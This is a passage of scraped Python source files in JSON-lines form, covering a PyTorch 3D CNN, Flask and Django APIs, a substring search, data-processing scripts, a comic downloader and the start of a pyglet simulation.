img_as_ubyte(img_0)\r\nimg_1 = img_as_ubyte(img_1)\r\nimg_2 = 
img_as_ubyte(img_2)\r\ncv2.imwrite(\"h.png\",img_0)\r\ncv2.imwrite(\"s.png\",img_1)\r\ncv2.imwrite(\"v.png\",img_2)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"dataset_dcm/data processing.py","file_name":"data processing.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"246839165","text":"import torch as t\n\nclass Net(t.nn.Module):#why do I need to inherit the Module class?\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = t.nn.Conv3d(2, 64, kernel_size=3, stride=1, padding=1)\n self.conv1_bn = t.nn.BatchNorm3d(64)\n self.conv11 = t.nn.Conv3d(2, 64, kernel_size=1, stride=1)\n \n self.conv1b = t.nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=1)\n self.conv1b_bn = t.nn.BatchNorm3d(64)\n self.conv1b1 = t.nn.Conv3d(64, 64, kernel_size=1, stride=1)\n \n self.conv1c = t.nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=1)\n self.conv1c_bn = t.nn.BatchNorm3d(64)\n self.conv1c1 = t.nn.Conv3d(64, 64, kernel_size=1, stride=1)\n \n \n self.conv2 = t.nn.Conv3d(64, 128, kernel_size=3, stride=2, padding=1)\n self.conv2_bn = t.nn.BatchNorm3d(128)\n self.conv21 = t.nn.Conv3d(64, 128, kernel_size=1, stride=2)\n \n self.conv3 = t.nn.Conv3d(128, 256, kernel_size=3, stride=2, padding=1)\n self.conv3_bn = t.nn.BatchNorm3d(256)\n self.conv31 = t.nn.Conv3d(128, 256, kernel_size=1, stride=2)\n \n self.conv4 = t.nn.Conv3d(256, 512, kernel_size=3, stride=2, padding=1)\n self.conv4_bn = t.nn.BatchNorm3d(512)\n self.conv41 = t.nn.Conv3d(256, 512, kernel_size=1, stride=2)\n \n self.conv5 = t.nn.Conv3d(512, 1024, kernel_size=3, stride=2, padding=1)\n self.conv5_bn = t.nn.BatchNorm3d(1024)\n self.conv51 = t.nn.Conv3d(512, 1024, kernel_size=1, stride=2)\n \n self.aapool = t.nn.AdaptiveAvgPool3d((1, 1, 1))\n #self.fc1 = t.nn.Linear(512, 512)\n self.fc1 = t.nn.Linear(1024, 2)\n\n \n def forward(self, x):\n x = t.nn.functional.relu(self.conv1_bn(self.conv1(x)))\n #res = t.nn.functional.relu(self.conv11(x))\n #x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv1b_bn(self.conv1b(x)))\n res = t.nn.functional.relu(self.conv1b1(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv1c_bn(self.conv1c(x)))\n res = t.nn.functional.relu(self.conv1c1(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv2_bn(self.conv2(x)))\n res = t.nn.functional.relu(self.conv21(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv3_bn(self.conv3(x)))\n res = t.nn.functional.relu(self.conv31(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv4_bn(self.conv4(x)))\n res = t.nn.functional.relu(self.conv41(x))\n x = x1 + res\n \n x1 = t.nn.functional.relu(self.conv5_bn(self.conv5(x)))\n res = t.nn.functional.relu(self.conv51(x))\n x = x1 + res\n\n x = self.aapool(x)\n\n x = x.squeeze(-1).squeeze(-1).squeeze(-1)\n\n #x = t.nn.functional.relu(self.fc1(x))\n x = self.fc1(x)\n x = t.nn.functional.log_softmax(x, dim=1)\n return x","sub_path":"headsal_net.py","file_name":"headsal_net.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"130324723","text":"__author__ = 'cliviazhou'\n\nimport base\n\n\nclass UserInfo:\n def __init__(self, _username, _nickname, _bio, _upvote, _thanks,\n _followers, _followees, _views, _weibo, _location,\n _business, _career, _education, _collection, _share):\n\n self.user_url = base.Url.PEOPLE_URL + _username\n 
self.nickname = _nickname\n self.bio = _bio\n self.upvote = _upvote\n self.thanks = _thanks\n self.followers = _followers\n self.followees = _followees\n self.views = _views\n self.webo = _weibo\n self.location = _location\n self.business = _business\n self.career = _career\n self.education = _education\n self.collection = _collection\n self.share = _share\n","sub_path":"zhihu/spiders/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507910516","text":"def substring_search(substring_list, data_string):\n\n search_data = []\n stack = []\n\n substring_list = [\n {\n \"value\": substring,\n \"length\": len(substring)\n } for substring in substring_list\n ]\n\n stop_char = \"\"\n char_list = list(data_string) + [stop_char]\n\n for position, char in enumerate(char_list):\n\n # processing\n for item in stack[:]:\n substring = substring_list[item[\"substring\"]]\n\n if not item[\"complete\"]:\n # match substring fully\n if item[\"span\"] == substring[\"length\"]:\n item[\"complete\"] = True\n else:\n # match substring\n if substring[\"value\"][item[\"span\"]] == char:\n item[\"span\"] += 1\n else:\n stack.remove(item)\n\n # extracting\n begin_limit = 0\n\n for item in stack[:]:\n # match begin not less then a limit\n if not item[\"begin\"] < begin_limit:\n # for complete match\n if item[\"complete\"]:\n substring = substring_list[item[\"substring\"]]\n search_data.append({\n \"position\": item[\"begin\"],\n \"substring\": substring[\"value\"]\n })\n\n begin_limit = item[\"begin\"] +item[\"span\"]\n else:\n break\n\n if item[\"begin\"] < begin_limit:\n stack.remove(item)\n\n # updating\n for index, substring in enumerate(substring_list):\n\n # match substring\n if char == substring[\"value\"][0]:\n stack.append({\n \"substring\": index,\n \"begin\": position,\n \"span\": 1,\n \"complete\": False\n })\n\n return search_data","sub_path":"libraries/substring_search_stack/substring_search.py","file_name":"substring_search.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"405195553","text":"from typing import Any\n\nfrom nekit_site.constants import routes\n\nfrom aiohttp import web\nimport gd\n\nclient = gd.server.CLIENT\nLEGACY_PASTEBIN = \"https://pastebin.com/raw/VXKF1KtN\"\n\n__all__ = (\"LEGACY_PASTEBIN\", \"check_level\")\n\n\nclass Singleton:\n instance = None\n\n def __new__(cls, *args, **kwargs) -> Any:\n if cls.instance is None:\n cls.instance = super().__new__(cls, *args, **kwargs)\n return cls.instance\n\n\nhandler = Singleton() # signleton uwu ~ nekit\nhandler.world_levels = ()\nhandler.map_packs = ()\nhandler.gauntlets = ()\nhandler.creators = ()\n\n\n@gd.tasks.loop(seconds=30)\nasync def loader() -> None:\n try:\n handler.world_levels = await client.search_levels(\n pages=range(100), filters=gd.Filters(strategy=\"world\")\n )\n handler.map_packs = await client.get_map_packs(pages=range(100))\n handler.gauntlets = await client.get_gauntlets()\n\n data = await client.http.normal_request(LEGACY_PASTEBIN)\n\n handler.creators = [name.lstrip(\"- \") for name in data.decode().split(\"\\r\\n\")]\n\n except Exception:\n pass # uwu\n\n\nloader.start()\n\n\n@routes.get(\"/legacy_project/{query}\")\n@gd.server.handle_errors(\n {\n ValueError: gd.server.Error(400, \"Invalid type in payload.\"),\n gd.MissingAccess: gd.server.Error(404, \"Requested level was not found.\"),\n 
}\n)\nasync def check_level(request: web.Request) -> web.Response:\n query = int(request.match_info.get(\"query\"))\n params = request.rel_url.query\n\n level = await client.get_level(query)\n\n checks = (\"reserved_ok\", \"world_or_packs_ok\", \"rate_status_ok\")\n analysis = []\n\n if not gd.server.str_to_bool(params.get(\"accept_reserved\", \"false\")):\n analysis.append(level.creator.name not in handler.creators)\n\n if not gd.server.str_to_bool(params.get(\"allow_world_or_packs\", \"false\")):\n check_against = {level.id for level in handler.world_levels}\n\n for map_pack in handler.map_packs:\n check_against.update(map_pack.level_ids)\n\n for gauntlet in handler.gauntlets:\n check_against.update(gauntlet.level_ids)\n\n analysis.append(level.id not in check_against)\n\n rate_map = {0: True, 1: level.is_rated(), 2: level.is_featured(), 3: level.is_epic()}\n\n analysis.append(rate_map.get(int(params.get(\"rate_status\", 2))))\n\n verified, detailed = all(analysis), dict(zip(checks, analysis))\n\n final = {\"approved\": verified, \"analysis\": detailed, \"data\": level}\n\n return gd.server.json_resp(final)\n","sub_path":"nekit_site/routes/legacy_project.py","file_name":"legacy_project.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391402986","text":"#!/bin/usr/python\n# Created by Jose \n# This file reads old-format DRM input files and translates them into new HDF5-based format.\n#\n\n# This file produces a rigid body input to the DRM layer. That is, all DRM nodes have same X-direction\n# displacement and acceleration. In this case a sine wave is used. This is not realistic, its\n# just for demonstration purposes. DRM won't work in this case but can be used to verify input if \n# a pseudo-static analysis is done (zero density on all elements and apply loads with transient\n# analysis.)\n\nimport scipy as sp\nimport h5py\nimport time\n\n#Write elements and nodes data\nelements = sp.loadtxt(\"DRMelements.txt\",dtype=sp.int32)\nexterior_nodes = sp.loadtxt(\"DRMexterior.txt\",dtype=sp.int32)\nboundary_nodes = sp.loadtxt(\"DRMbound.txt\",dtype=sp.int32)\n\nNe = sp.array(exterior_nodes.size)\nNb = sp.array(boundary_nodes.size)\n\nNt = Ne+Nb\n\nall_nodes = sp.hstack((boundary_nodes, exterior_nodes))\nis_boundary_node = sp.zeros(Nt, dtype=sp.int32)\nis_boundary_node[0:Nb] = 1\n\nh5file = h5py.File(\"input.hdf5\",\"w\")\n\nh5file.create_dataset(\"Elements\", data=elements)\nh5file.create_dataset(\"DRM Nodes\", data=all_nodes)\nh5file.create_dataset(\"Is Boundary Node\", data=is_boundary_node) #This array has 1 if the node at the corresponding position in \"DRM nodes\" array is a boundary node and zero if not\n\nh5file.create_dataset(\"Number of Exterior Nodes\", data=Ne)\nh5file.create_dataset(\"Number of Boundary Nodes\", data=Nb)\n\n#Write timestamp (time format used is that of c \"asctime\" Www Mmm dd hh:mm:ss yyyy example: Tue Jan 13 10:17:09 2009)\nlocaltime = time.asctime( time.localtime(time.time()) )\nh5file.create_dataset(\"Created\",data=str(localtime))\n\n#Generate motions\n\nt = sp.linspace(0,10,1001)\nw = 2*sp.pi/0.5\nd = sp.sin(w*t)\na = -w**2*sp.sin(w*t)\n\n#Output accelerations, displacements and time-vector\n\n#Format is:\n#\n# Accelerations has shape [3*(N_boundary_nodes + N_exterior_nodes) , Ntimesteps]\n#\n#\n# component A[3*n], A[3*n+1], A[3*n+2] correspond to acceleration in X, Y, and Z directions at node\n# n. 
The tag corresponding to node n that of the n-th component of array \"DRM Nodes\"\n\n#Time vector\n\nh5file.create_dataset(\"Time\", data=t)\n\nacc = h5file.create_dataset(\"Accelerations\", (3*Nt,len(t)), dtype=sp.double,chunks=(3,50))\ndis = h5file.create_dataset(\"Displacements\", (3*Nt,len(t)), dtype=sp.double,chunks=(3,50))\n\nfor node_index in range(Nt): \n\tacc[3*node_index,:] = a\n\tacc[3*node_index+1,:] = 0*a #Zero acceleration in y and z\n\tacc[3*node_index+2,:] = 0*a\n\tdis[3*node_index,:] = d\n\tdis[3*node_index+1,:] = 0*d #Zero displacement in y and z\n\tdis[3*node_index+2,:] = 0*d\n\n\n\nh5file.close()\n\n\n\n","sub_path":"document/Figure-files/generate_hdf5_drm_input.py","file_name":"generate_hdf5_drm_input.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"546466649","text":"\"\"\"\nFind the png files and show them in a list recursively.\n\"\"\"\n\nimport os\n\ndef search_png(path):\n \"\"\"search for png files\"\"\"\n result = []\n for root, folders, files in os.walk(path):\n png_files = []\n for file in files:\n if file.lower().endswith('.png'):\n png_files.append(file)\n if png_files:\n result.append(root)\n result.append(png_files)\n for folder in folders:\n search_png(folder)\n return result\n\n\nif __name__ == '__main__':\n PNG_FOLDER = input(\"File path >: \")\n # PNG_FOLDER = os.path.join(os.getcwd(), 'data', 'furniture', 'chair')\n PNG_FILES = search_png(PNG_FOLDER)\n print(PNG_FILES)\n","sub_path":"students/MzKhan/lesson09/pngdiscover.py","file_name":"pngdiscover.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"305349248","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import environ\n\napp = Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:root@localhost:3306/cs301_team1_ascenda'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://USERNAME:PASSWORD@ascenda-loyalty.canszqrplode.us-east-1.rds.amazonaws.com/cs301_team1_ascenda'\n# app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n \ndb = SQLAlchemy(app)\nCORS(app)\n\nclass AscendaExchangeRate(db.Model):\n __tablename__ = 'ascenda_exchange_rate'\n \n bank_id = db.Column(db.VARCHAR(100), primary_key=True)\n loyalty_id = db.Column(db.VARCHAR(100), primary_key=True)\n base_exchange_amount = db.Column(db.VARCHAR(80), nullable=False)\n loyalty_exchange_amount = db.Column(db.VARCHAR(80), nullable=False)\n \n def __init__(self, bank_id, loyalty_id, base_exchange_amount, loyalty_exchange_amount):\n self.bank_id = bank_id\n self.loyalty_id = loyalty_id\n self.base_exchange_amount = base_exchange_amount\n self.loyalty_exchange_amount = loyalty_exchange_amount\n\n \n def json(self):\n return {\"bank_id\": self.bank_id, \"loyalty_id\": self.loyalty_id, \"base_exchange_amount\": self.base_exchange_amount, \"loyalty_exchange_amount\": self.loyalty_exchange_amount}\n\n# get all \n@app.route(\"/ascenda/exchange_rate\")\ndef get_all():\n # query for all exchange rate\n\treturn jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.all()]})\n \n#get exchange rate with bank ID and partner ID\n@app.route(\"/exchange_rate//\")\ndef find_by_bankAndPartnerId(BankId, PartnerId):\n exchange_rate = 
AscendaExchangeRate.query.filter_by(bank_id=BankId, loyalty_id = PartnerId).all()\n if exchange_rate:\n return jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.filter_by(bank_id=BankId, loyalty_id = PartnerId)]})\n return jsonify({\"message\": \"ExchangeRate not found.\"}), 404\n\n#get exchange rate with bank ID\n@app.route(\"/ascenda/exchange_rate/\")\ndef find_by_bankId(BankId):\n exchange_rate = AscendaExchangeRate.query.filter_by(bank_id=BankId).all()\n if exchange_rate:\n return jsonify({\"exchange_rate\": [rate.json() for rate in AscendaExchangeRate.query.filter_by(bank_id=BankId)]})\n return jsonify({\"message\": \"ExchangeRate not found.\"}), 404\n\n# Create \n@app.route(\"/ascenda/exchange_rate///\", methods=['POST'])\ndef create_exchange_rate(BankId, PartnerId):\n if (AscendaExchangeRate.query.filter_by(bank_id = BankId, loyalty_id = PartnerId).first()):\n return jsonify({\"message\": \"The exchange rate already exists.\"}), 400\n\n data = request.get_json()\n print (data)\n rate_detail = AscendaExchangeRate(BankId, PartnerId, **data)\n \n try:\n db.session.add(rate_detail)\n db.session.commit()\n except:\n return jsonify({\"message\": \"An error occurred creating the exchange rate.\"}), 500\n\n return jsonify(rate_detail.json()), 201\n\n@app.route(\"/ascenda/exchange_rate/update///\", methods=['POST'])\ndef update_rate(BankId, PartnerId):\n rate_detail = AscendaExchangeRate.query.filter_by(bank_id = BankId, loyalty_id = PartnerId).first()\n data = request.get_json()\n\n if \"base_exchange_amount\" in data:\n rate_detail.base_exchange_amount = data[\"base_exchange_amount\"]\n\n if \"loyalty_exchange_amount\" in data:\n rate_detail.loyalty_exchange_amount = data[\"loyalty_exchange_amount\"]\n \n try:\n db.session.commit()\n \n except:\n return jsonify({\"message\": \"An error occurred updating the exchange rate.\"}),500\n\n return jsonify(rate_detail.json()),201\n\n\nif __name__ == '__main__': # if it is the main program you run, then start flask\n # with docker\n # app.run(host='0.0.0.0', port=5000, debug=True)\n app.run(host='0.0.0.0', port=5003, debug=True) #to allow the file to be named other stuff apart from app.py\n # debug=True; shows the error and it will auto restart\n","sub_path":"exchange_rate/exchange_rate.py","file_name":"exchange_rate.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"65361990","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''rename.py - adds a datestemp to all files that do not already have\none in '../data/local/downloads/'.\n'''\n\n# Libraries\nimport os\nimport errno\nimport argparse\nimport json\nfrom pprint import pprint\nimport re\nfrom datetime import datetime\n\n\ndef valid_filename(filename):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if not os.path.isfile(filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parses command line arguments. Returns a dictionary of arguments.\n '''\n parser = argparse.ArgumentParser(\n description='Renames each file in the downloads directory to include the current YYYY-MM-DD datestamp at the end of the filename. 
For example: mydata.csv is converted to mydata-2018-11-21.csv.',\n prog='rename'\n )\n\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to requex configuration file. File must be in JSON format.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. If filename is none, the function assumes that there are\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef run(config_file=None):\n # get configuration parameters\n config_file = get_config_filename(config_file)\n config = get_config(config_file)\n # print('configuration settings:')\n # pprint(config)\n\n # filenames to exclude from renaming\n exclude = config['excluded_files']\n\n # use the downloads directory for all actions\n downloads_dir = config['root_dir']+config['downloads_dir']\n\n # retreive the current date (UTC)\n now = datetime.utcnow()\n date = now.strftime('%Y-%m-%d')\n\n # get a list of all files in the downloads directory\n files = [f for f in os.listdir(downloads_dir)\n if os.path.isfile(downloads_dir+f)]\n\n # update all file names that do not already have a datestemp to\n # include the current date.\n for file in files:\n filename, extension = os.path.splitext(file)\n\n if filename in exclude:\n continue\n\n # check for a datestamp in the filename\n found_date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n if found_date == '':\n # no datestamp, append one\n os.rename(downloads_dir+file, downloads_dir+filename+'-'+date+extension)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"code/pipeline/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"531804218","text":"import numpy as np\nimport matplotlib.mlab as mlab\n\nclass STFT:\n def __init__(self, default_fs=44100, default_window_size=4096,\n default_overlap_ratio=0.5):\n ######################################################################\n # Sampling rate, related to the Nyquist conditions, which affects\n # the range frequencies we can detect.\n self.DEFAULT_FS = default_fs\n\n ######################################################################\n # Size of the FFT window, affects frequency granularity\n self.DEFAULT_WINDOW_SIZE = default_window_size\n\n ######################################################################\n # Ratio by which each sequential window overlaps the last and the\n # next window. 
Higher overlap will allow a higher granularity of offset\n # matching, but potentially more fingerprints.\n self.DEFAULT_OVERLAP_RATIO = default_overlap_ratio\n\n def get_2D_spectrum(self, channel_samples):\n \"\"\"\n FFT the channel, log transform output\n \"\"\"\n # FFT the signal and extract frequency components\n arr2D = mlab.specgram(\n channel_samples,\n NFFT=self.DEFAULT_WINDOW_SIZE,\n Fs=self.DEFAULT_FS,\n window=mlab.window_hanning,\n noverlap=int(self.DEFAULT_WINDOW_SIZE * self.DEFAULT_OVERLAP_RATIO))[0]\n\n # apply log transform since specgram() returns linear array\n arr2D = 10 * np.log10(arr2D)\n arr2D[arr2D == -np.inf] = 0 # replace infs with zeros\n return arr2D","sub_path":"tools/STFT.py","file_name":"STFT.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"320597239","text":"import datetime\n\nfrom django.db import transaction\n\nfrom restless.dj import DjangoResource\nfrom restless.preparers import FieldsPreparer\n\nfrom foia_hub.models import *\n\n\nclass AgencyResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'id': 'id',\n 'name': 'name',\n 'abbreviation': 'abbreviation',\n 'description': 'description',\n 'slug': 'slug',\n })\n\n # GET /\n def list(self):\n return Agency.objects.all()\n\n\nclass OfficeResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'id': 'id',\n 'name': 'name',\n 'slug': 'slug',\n\n 'service_center': 'service_center',\n 'fax': 'fax',\n\n 'request_form': 'request_form',\n 'website': 'website',\n 'emails': 'emails',\n\n 'contact': 'contact',\n 'contact_phone': 'contact_phone',\n 'public_liaison': 'public_liaison',\n\n 'notes': 'notes',\n })\n\n # GET /\n def list(self, slug):\n return Office.objects.filter(agency__slug=slug)\n\n\nclass FOIARequestResource(DjangoResource):\n\n preparer = FieldsPreparer(fields={\n 'status': 'status',\n 'requester': 'requester.pk',\n 'date_start': 'date_start',\n 'date_end': 'date_end',\n 'fee_limit': 'fee_limit',\n 'request_body': 'request_body',\n 'custom_fields': 'custom_fields',\n 'tracking_id': 'pk',\n })\n\n def _convert_date(self, date):\n return datetime.datetime.strptime(date, '%B %d, %Y')\n\n # POST /\n def create(self):\n\n foia = None\n with transaction.atomic():\n\n office = Office.objects.get(\n agency__slug=self.data['agency'],\n slug=self.data['office'],\n )\n\n requester = Requester.objects.create(\n first_name=self.data['first_name'],\n last_name=self.data['last_name'],\n email=self.data['email']\n )\n\n start = self._convert_date(self.data['documents_start'])\n end = self._convert_date(self.data['documents_end'])\n\n foia = FOIARequest.objects.create(\n status='O',\n requester=requester,\n office=office,\n date_start=start,\n date_end=end,\n request_body=self.data['body'],\n custom_fields=self.data['agency_fields'],\n )\n\n return foia\n\n # GET /\n def list(self):\n return FOIARequest.objects.all()\n\n # Open everything wide!\n # DANGEROUS, DO NOT DO IN PRODUCTION.\n # more info here:\n # https://github.com/toastdriven/restless/blob/master/docs/tutorial.rst\n def is_authenticated(self):\n return True\n","sub_path":"foia_hub/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"222395151","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import basename\nimport numpy as np\nfrom utils.progressbar import wrap_iterator\n\n\ndef stack_frame(input_list, input_paths, frame_num_dict, num_stack, num_skip,\n progressbar=False):\n \"\"\"Stack & skip some frames. This implementation is based on\n https://arxiv.org/abs/1507.06947.\n Sak, Haşim, et al.\n \"Fast and accurate recurrent neural network acoustic models for speech recognition.\"\n arXiv preprint arXiv:1507.06947 (2015).\n Args:\n input_list (list): list of input data\n input_paths (list): paths to input data. This is used to get the\n number of frames from frame_num_dict.\n frame_num_dict (dict):\n key (string) => utterance index\n value (int) => the number of frames\n num_stack (int): the number of frames to stack\n num_skip (int): the number of frames to skip\n progressbar (bool, optional): if True, visualize progressbar\n Returns:\n stacked_input_list (list): list of frame-stacked inputs\n \"\"\"\n if num_stack == 1 and num_stack == 1:\n return input_list\n\n if num_stack < num_skip:\n raise ValueError('num_skip must be less than num_stack.')\n\n input_size = input_list[0].shape[1]\n utt_num = len(input_paths)\n\n stacked_input_list = []\n for i_utt in wrap_iterator(range(utt_num), progressbar):\n # Per utterance\n input_name = basename(input_paths[i_utt]).split('.')[0]\n frame_num = frame_num_dict[input_name]\n frame_num_decimated = frame_num / num_skip\n if frame_num_decimated != int(frame_num_decimated):\n frame_num_decimated += 1\n frame_num_decimated = int(frame_num_decimated)\n\n stacked_frames = np.zeros(\n (frame_num_decimated, input_size * num_stack))\n stack_count = 0 # counter for stacked_frames\n stack = []\n for i_frame, frame in enumerate(input_list[i_utt]):\n #####################\n # final frame\n #####################\n if i_frame == len(input_list[i_utt]) - 1:\n # Stack the final frame\n stack.append(frame)\n\n while stack_count != int(frame_num_decimated):\n # Concatenate stacked frames\n for i_stack in range(len(stack)):\n stacked_frames[stack_count][input_size *\n i_stack:input_size * (i_stack + 1)] = stack[i_stack]\n stack_count += 1\n\n # Delete some frames to skip\n for _ in range(num_skip):\n if len(stack) != 0:\n stack.pop(0)\n\n ########################\n # first & middle frames\n ########################\n elif len(stack) < num_stack:\n # Stack some frames until stack is filled\n stack.append(frame)\n\n if len(stack) == num_stack:\n # Concatenate stacked frames\n for i_stack in range(num_stack):\n stacked_frames[stack_count][input_size *\n i_stack:input_size * (i_stack + 1)] = stack[i_stack]\n stack_count += 1\n\n # Delete some frames to skip\n for _ in range(num_skip):\n stack.pop(0)\n\n stacked_input_list.append(stacked_frames)\n\n return np.array(stacked_input_list)\n","sub_path":"utils/io/inputs/frame_stacking.py","file_name":"frame_stacking.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"377981131","text":"#! python3\n# downloadXkcd.py - Downloads comic with cron - schedule tool\n\nimport requests\nimport os\nimport bs4\n\nurl = 'http://www.lefthandedtoons.com'\nprint('Downloading page %s...' 
% url)\nres = requests.get(url)\nres.raise_for_status()\n\nsoup = bs4.BeautifulSoup(res.text, features='html.parser')\n\n# Find the URL of the comic image.\ncomicElem = soup.select('.comicimage')\nif not comicElem:\n print('Could not find comic image.')\nelse:\n comicURL = comicElem[0].get('src')\n # Download the image.\n print('Downloading image %s...' % comicURL)\n res = requests.get(comicURL)\n res.raise_for_status()\n\n # Save the image to ./xkcd.\n imageFile = open(os.path.join('/home/bart/Desktop', os.path.basename(comicURL)), 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n\n\nprint('Done.')\n","sub_path":"Scheduled Web Comic Downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"569168213","text":"#!/usr/bin/python\nimport os, sys\n\nactivate_this = '/srv/teleskype_web/virtualenv/bin/activate_this.py'\nwith open(activate_this) as f:\n code = compile(f.read(), activate_this, 'exec')\n exec(code, dict(__file__=activate_this))\n\nsys.path.append('/srv/teleskype_web/')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"teleskype_web.settings\")\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n","sub_path":"example_wsgi.py","file_name":"example_wsgi.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"63777304","text":"import pyglet.gl as gl\nimport numpy as np\nimport numpy.matlib\nimport matplotlib.colors as mcol\nimport pyglet\nimport time\nimport pandas as pd\n\n# O: Object e.g. vtsO: vertexes in Object Coordinate System\n# W: World e.g. 
vtsW: vertexes in World Coordinate System\ngravity = 9.81\nw = 1080 # Screen width\nh = 720 # Screen height\nlw = 2.0 # Line width\n\nconfig = gl.Config(sample_buffers=1, samples=8) # Anti-aliasing\nwindow = pyglet.window.Window(w, h, config=config)\n\n# Angle to rotation matrix\ndef rad2rm(theta):\n s = np.sin(theta)\n c = np.cos(theta)\n return np.mat([[c, -s], [s, c]])\n\n# Value remap\ndef remap(x, old_min, old_max, new_min=0., new_max=1.):\n old_mean = .5*(old_max+old_min)\n old_range = old_max - old_min\n new_mean = .5*(new_max+new_min)\n new_range = new_max - new_min\n y = (x-old_mean)*new_range/old_range + new_mean\n return y\n\n\nclass Camera:\n def __init__(self, scale=200.0, theta=0.0, x=0.0, y=0.0):\n self.scale = scale # Zoom factor: Pixels Per Meter\n self.theta = theta # Camera roll angle\n self.trans = np.mat([x, y]).T # Camera position\n self.rotmat = rad2rm(theta) # Rotation matrix\n self.offset = np.mat([w / 2, h / 2]).T # Camera offset\n\n def setPosition(self, x, y):\n self.trans[0, 0] = x\n self.trans[1, 0] = y\n\n def setX(self, x):\n self.trans[0, 0] = x\n\n def setY(self, y):\n self.trans[1, 0] = y\n\n def getX(self):\n return self.trans[0, 0]\n\n def getY(self):\n return self.trans[1, 0]\n\n def setDirectionDeg(self, theta):\n self.theta = np.deg2rad(theta)\n self.rotmat = rad2rm(self.theta)\n\n def setDirectionRad(self, theta):\n self.theta = theta\n self.rotmat = rad2rm(theta)\n\n def project(self, vts):\n return self.rotmat.T * vts * self.scale - self.trans * self.scale + self.offset\n\n\nclass Element:\n def __init__(self, num_vts=1, x=0.0, y=0.0, camera=None):\n self.num_vts = num_vts # Vertexes number\n self.vtsO = np.matlib.zeros((2, num_vts)) # Vertexes represented in Object Coordinate System\n self.pivotO = np.matlib.zeros((2, 1)) # Center of rotation represented in Object Coordinate System\n 